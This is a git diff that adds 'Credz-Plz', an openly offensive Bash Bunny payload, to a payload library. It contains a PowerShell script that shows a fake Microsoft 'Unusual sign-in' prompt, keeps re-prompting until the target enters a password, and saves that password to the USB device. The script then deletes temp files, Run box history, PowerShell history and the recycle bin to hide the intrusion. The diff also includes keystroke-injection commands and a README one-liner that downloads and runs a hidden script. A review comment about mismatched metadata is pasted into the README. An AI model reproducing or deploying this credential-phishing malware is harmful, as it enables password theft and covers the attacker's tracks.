diff --git a/payloads/library/credentials/-BB-Credz-Plz/Credz-Plz.ps1 b/payloads/library/credentials/-BB-Credz-Plz/Credz-Plz.ps1
new file mode 100644
index 00000000..c50de216
--- /dev/null
+++ b/payloads/library/credentials/-BB-Credz-Plz/Credz-Plz.ps1
@@ -0,0 +1,178 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : Credz-Plz | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Credentials | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.SYNOPSIS
+ This script is meant to trick your target into sharing their credentials through a fake authentication pop up message
+
+.DESCRIPTION
+ A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
+ This will be followed by a fake authentication ui prompt.
+ If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up
+ Once the target enters their credentials their information will be uploaded to your Bash Bunny
+
+#>
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+# Creating loot folder
+
+# Get Drive Letter
+$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name
+
+# Test if directory exists if not create directory in loot folder to store file
+$TARGETDIR = "$bb\loot\Credz-Plz\$env:computername"
+
+if(!(Test-Path -Path $TARGETDIR )){
+ mkdir $TARGETDIR
+}
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt"
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to generate the ui.prompt you will use to harvest their credentials
+#>
+
+function Get-Creds {
+do{
+$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
+ if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password)) {
+ [System.Windows.Forms.MessageBox]::Show("Credentials can not be empty!")
+ Get-Creds
+}
+$creds = $cred.GetNetworkCredential() | fl
+return $creds
+ # ...
+
+ $done = $true
+} until ($done)
+
+}
+
+#----------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to pause the script until a mouse movement is detected
+#>
+
+function Pause-Script{
+Add-Type -AssemblyName System.Windows.Forms
+$originalPOS = [System.Windows.Forms.Cursor]::Position.X
+$o=New-Object -ComObject WScript.Shell
+
+ while (1) {
+ $pauseTime = 3
+ if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
+ break
+ }
+ else {
+ $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
+ }
+ }
+}
+
+#----------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off
+#>
+
+function Caps-Off {
+Add-Type -AssemblyName System.Windows.Forms
+$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
+
+#If true, toggle CapsLock key, to ensure that the script doesn't fail
+if ($caps -eq $true){
+
+$key = New-Object -ComObject WScript.Shell
+$key.SendKeys('{CapsLock}')
+}
+}
+#----------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to call the function to pause the script until a mouse movement is detected then activate the pop-up
+#>
+
+Pause-Script
+
+Caps-Off
+
+Add-Type -AssemblyName System.Windows.Forms
+
+[System.Windows.Forms.MessageBox]::Show("Unusual sign-in. 
Please authenticate your Microsoft Account")
+
+$creds = Get-Creds
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to save the gathered credentials to a file in the temp directory
+#>
+
+echo $creds >> $env:TMP\$FileName
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This exfiltrates your loot to the Bash Bunny
+#>
+
+Move-Item $env:TMP\$FileName $TARGETDIR\$FileName
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to clean up behind you and remove any evidence to prove you were there
+#>
+
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
+
diff --git a/payloads/library/credentials/-BB-Credz-Plz/README.md b/payloads/library/credentials/-BB-Credz-Plz/README.md
new file mode 100644
index 00000000..0f9b198e
--- /dev/null
+++ b/payloads/library/credentials/-BB-Credz-Plz/README.md
@@ -0,0 +1,102 @@
+![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
+
+
+
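Review bot: The metadata in this file's header disagrees with the payload.txt added in the same commit: the header states `# Mode : HID` and `# Target : Windows 7,10,11`, while payload.txt declares `# Attackmodes: HID, Storage` and `# Target: Windows 10, 11`, and the script itself resolves the loot path with `gwmi win32_volume -f 'label=''BashBunny'''`, so it depends on the storage attack mode that the header omits. The category also differs between the two files (`Category : Credentials` here, `Category: Recon` in payload.txt) even though both sit under a `credentials/` directory. I would change the header to `# Mode : HID, Storage` and `# Target : Windows 10,11` and make payload.txt read `# Category: Credentials`. The README in this commit still describes the Dropbox/OMG variant (shared-link download, `OMG/Payloads` image paths), which adds to the confusion for whoever maintains the three files together.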
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+
+# Credz-Plz
+
+A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.
+
+## Description
+
+A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
+This will be followed by a fake authentication ui prompt.
+If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up
+Once the target enters their credentials their information will be uploaded to your dropbox for collection
+
+![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/unusual-sign-in.jpg)
+
+![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/sign-in.jpg)
+
+## Getting Started
+
+### Dependencies
+
+* DropBox or other file sharing service - Your Shared link for the intended file
+* Windows 10,11
+
+

(back to top)

+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+```
+powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
+```
+
+

(back to top)

+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+

(back to top)

+
+## Version History
+
+* 0.1
+ * Initial Release
+
+

(back to top)

+
+
+## Contact
+
+

I am Jakoby

+


+ + + + + + + + + + + + + + + + + + + + Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon) +

+ + + +

(back to top)

+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+

(back to top)

diff --git a/payloads/library/credentials/-BB-Credz-Plz/payload.txt b/payloads/library/credentials/-BB-Credz-Plz/payload.txt
new file mode 100644
index 00000000..b6650db1
--- /dev/null
+++ b/payloads/library/credentials/-BB-Credz-Plz/payload.txt
@@ -0,0 +1,22 @@
+# Title: Credz-Plz
+# Description: A script used to prompt the target to enter their creds to later be exfiltrated to the Bash Bunny
+# Author: I am Jakoby
+# Version: 1.0
+# Category: Recon
+# Attackmodes: HID, Storage
+# Target: Windows 10, 11
+
+LED SETUP
+
+GET SWITCH_POSITION
+
+ATTACKMODE HID STORAGE
+
+LED STAGE1
+
+QUACK DELAY 3000
+QUACK GUI r
+QUACK DELAY 100
+LED STAGE2
+QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Credz-Plz.ps1')"
+QUACK ENTER
diff --git a/payloads/library/credentials/-BB-Credz-Plz/sign-in.jpg b/payloads/library/credentials/-BB-Credz-Plz/sign-in.jpg
new file mode 100644
index 00000000..3330e2a4
Binary files /dev/null and b/payloads/library/credentials/-BB-Credz-Plz/sign-in.jpg differ
diff --git a/payloads/library/credentials/-BB-Credz-Plz/unusual-sign-in.jpg b/payloads/library/credentials/-BB-Credz-Plz/unusual-sign-in.jpg
new file mode 100644
index 00000000..ff0aad93
Binary files /dev/null and b/payloads/library/credentials/-BB-Credz-Plz/unusual-sign-in.jpg differ